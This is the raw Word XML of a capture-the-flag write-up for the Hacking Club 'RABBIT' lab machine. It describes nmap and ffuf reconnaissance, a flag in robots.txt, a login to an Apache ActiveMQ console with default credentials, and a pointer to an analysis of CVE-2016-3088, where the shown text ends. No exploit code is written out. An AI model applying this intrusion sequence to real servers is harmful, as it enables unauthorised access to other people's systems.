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pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.md5x29xlq8di" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.w1hcz8xjrvf5" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">About Hacking Club</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">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Hacking Club is a platform to learn cybersecurity, an incredible resource if you don’t know where to start. In addition to vulnerable machines, you have access to classes and challenges to practice your skills and access to an exclusive community to play and challenge yourself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6gjyyfwyiu02" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The best part about </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacking Club</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is that it is very hands-on. If you are new to hacking, give it a try.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.le3alcaxdf4o" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This write-up refers to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">RABBIT</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine. If you require support, please open a ticket in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">support channel on the Discord server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1m43oosogmva" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap Scan:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">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need to know which services are running in the background and which ports are open. So, we will use a tool called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</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0B">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184400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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943600" cy="21844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pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.7r2obq8hyepj" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4572000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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5943600" cy="457200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pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1j77go8cox77" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf Scan:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">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will use a tool called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which uses an existing wordlist of possible common directory names and attempts to load all directory names from that wordlist, then checks the HTTP status code. (If you are using Kali or ParrotOS, you can find these wordlists in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/dirbuster</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or you can use those from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SecList</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0F">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679700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59" name="image17.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="267970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Looking at the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">robots.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, we can find our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">first flag</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11">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527300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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943600" cy="25273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spending some time on port 80, I couldn’t find anything interesting, but when checking port 8161, we find something interesting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">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3416300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="48"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5943600" cy="34163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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache ActiveMQ</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an open-source message-oriented middleware written in Java. Eclipse Jetty is a Java HTTP (Web) server and Java Servlet container that supports web containers such as JSP and servlet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">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performing directory fuzzing on this port, I find </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin</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16">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971800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71" name="image16.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image16.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.a48o0j6y92dr" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">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Searching for default credentials for ApacheMQ, I find:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">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3454400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65" name="image11.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image11.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="345440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logging in, we gain access to the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ApacheMQ</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> web console.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">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971800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52" name="image12.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image12.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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Searching for an authenticated exploit for ApacheMQ, we find something very interesting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis of Apache ActiveMQ Remote Code Execution Vulnerability (CVE-2016-3088)</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Author: Knownsec 404 Team</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Chinese Version:</w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://paper.seebug.org/346/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">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Apache ActiveMQ is an open-source message-oriented middleware written in Java. Eclipse Jetty is a Java HTTP (Web) server and Java Servlet container which supports web containers such as JSP and servlet. ActiveMQ 5.0 and later versions have Jetty integrated by default.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
